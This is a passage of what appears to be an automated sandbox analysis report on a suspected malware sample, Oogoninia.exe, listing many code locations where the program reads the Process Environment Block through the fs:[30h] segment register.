        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32521051 mov eax, dword ptr fs:[00000030h]2_2_32521051
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F505B mov eax, dword ptr fs:[00000030h]2_2_325F505B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32550044 mov eax, dword ptr fs:[00000030h]2_2_32550044
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32527072 mov eax, dword ptr fs:[00000030h]2_2_32527072
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32526074 mov eax, dword ptr fs:[00000030h]2_2_32526074
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32526074 mov eax, dword ptr fs:[00000030h]2_2_32526074
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325C9060 mov eax, dword ptr fs:[00000030h]2_2_325C9060
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562010 mov ecx, dword ptr fs:[00000030h]2_2_32562010
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32545004 mov eax, dword ptr fs:[00000030h]2_2_32545004
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32545004 mov ecx, dword ptr fs:[00000030h]2_2_32545004
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32528009 mov eax, dword ptr fs:[00000030h]2_2_32528009
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251D02D mov eax, dword ptr fs:[00000030h]2_2_3251D02D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253B0D0 mov eax, dword ptr fs:[00000030h]2_2_3253B0D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B0D6 mov eax, dword ptr fs:[00000030h]2_2_3251B0D6
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B0D6 mov eax, dword ptr fs:[00000030h]2_2_3251B0D6
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B0D6 mov eax, dword ptr fs:[00000030h]2_2_3251B0D6
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251B0D6 mov eax, dword ptr fs:[00000030h]2_2_3251B0D6
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255D0F0 mov eax, dword ptr fs:[00000030h]2_2_3255D0F0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255D0F0 mov ecx, dword ptr fs:[00000030h]2_2_3255D0F0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251C0F6 mov eax, dword ptr fs:[00000030h]2_2_3251C0F6
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325190F8 mov eax, dword ptr fs:[00000030h]2_2_325190F8
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325190F8 mov eax, dword ptr fs:[00000030h]2_2_325190F8
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325190F8 mov eax, dword ptr fs:[00000030h]2_2_325190F8
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325190F8 mov eax, dword ptr fs:[00000030h]2_2_325190F8
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251C090 mov eax, dword ptr fs:[00000030h]2_2_3251C090
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251A093 mov ecx, dword ptr fs:[00000030h]2_2_3251A093
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F4080 mov eax, dword ptr fs:[00000030h]2_2_325F4080
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F4080 mov eax, dword ptr fs:[00000030h]2_2_325F4080
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F4080 mov eax, dword ptr fs:[00000030h]2_2_325F4080
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F4080 mov eax, dword ptr fs:[00000030h]2_2_325F4080
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F4080 mov eax, dword ptr fs:[00000030h]2_2_325F4080
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F4080 mov eax, dword ptr fs:[00000030h]2_2_325F4080
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F4080 mov eax, dword ptr fs:[00000030h]2_2_325F4080
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DB0AF mov eax, dword ptr fs:[00000030h]2_2_325DB0AF
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325600A5 mov eax, dword ptr fs:[00000030h]2_2_325600A5
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F3157 mov eax, dword ptr fs:[00000030h]2_2_325F3157
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F3157 mov eax, dword ptr fs:[00000030h]2_2_325F3157
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F3157 mov eax, dword ptr fs:[00000030h]2_2_325F3157
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255415F mov eax, dword ptr fs:[00000030h]2_2_3255415F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B314A mov eax, dword ptr fs:[00000030h]2_2_325B314A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B314A mov eax, dword ptr fs:[00000030h]2_2_325B314A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B314A mov eax, dword ptr fs:[00000030h]2_2_325B314A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B314A mov eax, dword ptr fs:[00000030h]2_2_325B314A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251A147 mov eax, dword ptr fs:[00000030h]2_2_3251A147
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251A147 mov eax, dword ptr fs:[00000030h]2_2_3251A147
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251A147 mov eax, dword ptr fs:[00000030h]2_2_3251A147
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F5149 mov eax, dword ptr fs:[00000030h]2_2_325F5149
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32526179 mov eax, dword ptr fs:[00000030h]2_2_32526179
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3257717A mov eax, dword ptr fs:[00000030h]2_2_3257717A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3257717A mov eax, dword ptr fs:[00000030h]2_2_3257717A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255716D mov eax, dword ptr fs:[00000030h]2_2_3255716D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F113 mov eax, dword ptr fs:[00000030h]2_2_3251F113
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32550118 mov eax, dword ptr fs:[00000030h]2_2_32550118
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254510F mov eax, dword ptr fs:[00000030h]2_2_3254510F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254510F mov eax, dword ptr fs:[00000030h]2_2_3254510F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254510F mov eax, dword ptr fs:[00000030h]2_2_3254510F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254510F mov eax, dword ptr fs:[00000030h]2_2_3254510F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254510F mov eax, dword ptr fs:[00000030h]2_2_3254510F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254510F mov eax, dword ptr fs:[00000030h]2_2_3254510F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254510F mov eax, dword ptr fs:[00000030h]2_2_3254510F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254510F mov eax, dword ptr fs:[00000030h]2_2_3254510F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254510F mov eax, dword ptr fs:[00000030h]2_2_3254510F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254510F mov eax, dword ptr fs:[00000030h]2_2_3254510F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254510F mov eax, dword ptr fs:[00000030h]2_2_3254510F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254510F mov eax, dword ptr fs:[00000030h]2_2_3254510F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254510F mov eax, dword ptr fs:[00000030h]2_2_3254510F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252510D mov eax, dword ptr fs:[00000030h]2_2_3252510D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF13E mov eax, dword ptr fs:[00000030h]2_2_325DF13E
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AA130 mov eax, dword ptr fs:[00000030h]2_2_325AA130
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32557128 mov eax, dword ptr fs:[00000030h]2_2_32557128
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32557128 mov eax, dword ptr fs:[00000030h]2_2_32557128
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325301C0 mov eax, dword ptr fs:[00000030h]2_2_325301C0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325301C0 mov eax, dword ptr fs:[00000030h]2_2_325301C0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325351C0 mov eax, dword ptr fs:[00000030h]2_2_325351C0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325351C0 mov eax, dword ptr fs:[00000030h]2_2_325351C0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325351C0 mov eax, dword ptr fs:[00000030h]2_2_325351C0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325351C0 mov eax, dword ptr fs:[00000030h]2_2_325351C0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325191F0 mov eax, dword ptr fs:[00000030h]2_2_325191F0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325191F0 mov eax, dword ptr fs:[00000030h]2_2_325191F0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325301F1 mov eax, dword ptr fs:[00000030h]2_2_325301F1
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325301F1 mov eax, dword ptr fs:[00000030h]2_2_325301F1
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325301F1 mov eax, dword ptr fs:[00000030h]2_2_325301F1
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F1F0 mov eax, dword ptr fs:[00000030h]2_2_3254F1F0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254F1F0 mov eax, dword ptr fs:[00000030h]2_2_3254F1F0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E81EE mov eax, dword ptr fs:[00000030h]2_2_325E81EE
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E81EE mov eax, dword ptr fs:[00000030h]2_2_325E81EE
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252A1E3 mov eax, dword ptr fs:[00000030h]2_2_3252A1E3
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252A1E3 mov eax, dword ptr fs:[00000030h]2_2_3252A1E3
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252A1E3 mov eax, dword ptr fs:[00000030h]2_2_3252A1E3
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252A1E3 mov eax, dword ptr fs:[00000030h]2_2_3252A1E3
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252A1E3 mov eax, dword ptr fs:[00000030h]2_2_3252A1E3
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254B1E0 mov eax, dword ptr fs:[00000030h]2_2_3254B1E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254B1E0 mov eax, dword ptr fs:[00000030h]2_2_3254B1E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254B1E0 mov eax, dword ptr fs:[00000030h]2_2_3254B1E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254B1E0 mov eax, dword ptr fs:[00000030h]2_2_3254B1E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254B1E0 mov eax, dword ptr fs:[00000030h]2_2_3254B1E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254B1E0 mov eax, dword ptr fs:[00000030h]2_2_3254B1E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254B1E0 mov eax, dword ptr fs:[00000030h]2_2_3254B1E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325291E5 mov eax, dword ptr fs:[00000030h]2_2_325291E5
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325291E5 mov eax, dword ptr fs:[00000030h]2_2_325291E5
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325181EB mov eax, dword ptr fs:[00000030h]2_2_325181EB
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32549194 mov eax, dword ptr fs:[00000030h]2_2_32549194
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561190 mov eax, dword ptr fs:[00000030h]2_2_32561190
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32561190 mov eax, dword ptr fs:[00000030h]2_2_32561190
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32524180 mov eax, dword ptr fs:[00000030h]2_2_32524180
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32524180 mov eax, dword ptr fs:[00000030h]2_2_32524180
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32524180 mov eax, dword ptr fs:[00000030h]2_2_32524180
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F51B6 mov eax, dword ptr fs:[00000030h]2_2_325F51B6
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325531BE mov eax, dword ptr fs:[00000030h]2_2_325531BE
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325531BE mov eax, dword ptr fs:[00000030h]2_2_325531BE
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325541BB mov ecx, dword ptr fs:[00000030h]2_2_325541BB
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325541BB mov eax, dword ptr fs:[00000030h]2_2_325541BB
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325541BB mov eax, dword ptr fs:[00000030h]2_2_325541BB
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E1A4 mov eax, dword ptr fs:[00000030h]2_2_3255E1A4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255E1A4 mov eax, dword ptr fs:[00000030h]2_2_3255E1A4
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32555654 mov eax, dword ptr fs:[00000030h]2_2_32555654
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252965A mov eax, dword ptr fs:[00000030h]2_2_3252965A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252965A mov eax, dword ptr fs:[00000030h]2_2_3252965A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255265C mov eax, dword ptr fs:[00000030h]2_2_3255265C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255265C mov ecx, dword ptr fs:[00000030h]2_2_3255265C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255265C mov eax, dword ptr fs:[00000030h]2_2_3255265C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32523640 mov eax, dword ptr fs:[00000030h]2_2_32523640
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253F640 mov eax, dword ptr fs:[00000030h]2_2_3253F640
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253F640 mov eax, dword ptr fs:[00000030h]2_2_3253F640
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3253F640 mov eax, dword ptr fs:[00000030h]2_2_3253F640
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255C640 mov eax, dword ptr fs:[00000030h]2_2_3255C640
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255C640 mov eax, dword ptr fs:[00000030h]2_2_3255C640
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251D64A mov eax, dword ptr fs:[00000030h]2_2_3251D64A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251D64A mov eax, dword ptr fs:[00000030h]2_2_3251D64A
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32520670 mov eax, dword ptr fs:[00000030h]2_2_32520670
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562670 mov eax, dword ptr fs:[00000030h]2_2_32562670
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32562670 mov eax, dword ptr fs:[00000030h]2_2_32562670
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32517662 mov eax, dword ptr fs:[00000030h]2_2_32517662
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32517662 mov eax, dword ptr fs:[00000030h]2_2_32517662
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32517662 mov eax, dword ptr fs:[00000030h]2_2_32517662
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32533660 mov eax, dword ptr fs:[00000030h]2_2_32533660
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32533660 mov eax, dword ptr fs:[00000030h]2_2_32533660
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32533660 mov eax, dword ptr fs:[00000030h]2_2_32533660
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255666D mov esi, dword ptr fs:[00000030h]2_2_3255666D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255666D mov eax, dword ptr fs:[00000030h]2_2_3255666D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255666D mov eax, dword ptr fs:[00000030h]2_2_3255666D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B3608 mov eax, dword ptr fs:[00000030h]2_2_325B3608
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B3608 mov eax, dword ptr fs:[00000030h]2_2_325B3608
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B3608 mov eax, dword ptr fs:[00000030h]2_2_325B3608
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B3608 mov eax, dword ptr fs:[00000030h]2_2_325B3608
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B3608 mov eax, dword ptr fs:[00000030h]2_2_325B3608
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325B3608 mov eax, dword ptr fs:[00000030h]2_2_325B3608
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254D600 mov eax, dword ptr fs:[00000030h]2_2_3254D600
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254D600 mov eax, dword ptr fs:[00000030h]2_2_3254D600
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF607 mov eax, dword ptr fs:[00000030h]2_2_325DF607
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255360F mov eax, dword ptr fs:[00000030h]2_2_3255360F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325F4600 mov eax, dword ptr fs:[00000030h]2_2_325F4600
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32520630 mov eax, dword ptr fs:[00000030h]2_2_32520630
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32550630 mov eax, dword ptr fs:[00000030h]2_2_32550630
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A8633 mov esi, dword ptr fs:[00000030h]2_2_325A8633
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A8633 mov eax, dword ptr fs:[00000030h]2_2_325A8633
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325A8633 mov eax, dword ptr fs:[00000030h]2_2_325A8633
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255F63F mov eax, dword ptr fs:[00000030h]2_2_3255F63F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255F63F mov eax, dword ptr fs:[00000030h]2_2_3255F63F
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325CD62C mov ecx, dword ptr fs:[00000030h]2_2_325CD62C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325CD62C mov ecx, dword ptr fs:[00000030h]2_2_325CD62C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325CD62C mov eax, dword ptr fs:[00000030h]2_2_325CD62C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32525622 mov eax, dword ptr fs:[00000030h]2_2_32525622
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32525622 mov eax, dword ptr fs:[00000030h]2_2_32525622
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32527623 mov eax, dword ptr fs:[00000030h]2_2_32527623
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255C620 mov eax, dword ptr fs:[00000030h]2_2_3255C620
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3254D6D0 mov eax, dword ptr fs:[00000030h]2_2_3254D6D0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325206CF mov eax, dword ptr fs:[00000030h]2_2_325206CF
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325C86C2 mov eax, dword ptr fs:[00000030h]2_2_325C86C2
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259C6F2 mov eax, dword ptr fs:[00000030h]2_2_3259C6F2
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259C6F2 mov eax, dword ptr fs:[00000030h]2_2_3259C6F2
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325196E0 mov eax, dword ptr fs:[00000030h]2_2_325196E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325196E0 mov eax, dword ptr fs:[00000030h]2_2_325196E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3252C6E0 mov eax, dword ptr fs:[00000030h]2_2_3252C6E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325256E0 mov eax, dword ptr fs:[00000030h]2_2_325256E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325256E0 mov eax, dword ptr fs:[00000030h]2_2_325256E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325256E0 mov eax, dword ptr fs:[00000030h]2_2_325256E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325466E0 mov eax, dword ptr fs:[00000030h]2_2_325466E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325466E0 mov eax, dword ptr fs:[00000030h]2_2_325466E0
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32528690 mov eax, dword ptr fs:[00000030h]2_2_32528690
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3259D69D mov eax, dword ptr fs:[00000030h]2_2_3259D69D
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325AC691 mov eax, dword ptr fs:[00000030h]2_2_325AC691
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325DF68C mov eax, dword ptr fs:[00000030h]2_2_325DF68C
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E86A8 mov eax, dword ptr fs:[00000030h]2_2_325E86A8
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_325E86A8 mov eax, dword ptr fs:[00000030h]2_2_325E86A8
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32542755 mov eax, dword ptr fs:[00000030h]2_2_32542755
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32542755 mov eax, dword ptr fs:[00000030h]2_2_32542755
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32542755 mov eax, dword ptr fs:[00000030h]2_2_32542755
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32542755 mov ecx, dword ptr fs:[00000030h]2_2_32542755
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32542755 mov eax, dword ptr fs:[00000030h]2_2_32542755
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_32542755 mov eax, dword ptr fs:[00000030h]2_2_32542755
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3255A750 mov eax, dword ptr fs:[00000030h]2_2_3255A750
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
        Source: C:\Users\user\Desktop\Oogoninia.exeCode function: 2_2_3251F75B mov eax, dword ptr fs:[00000030h]2_2_3251F75B
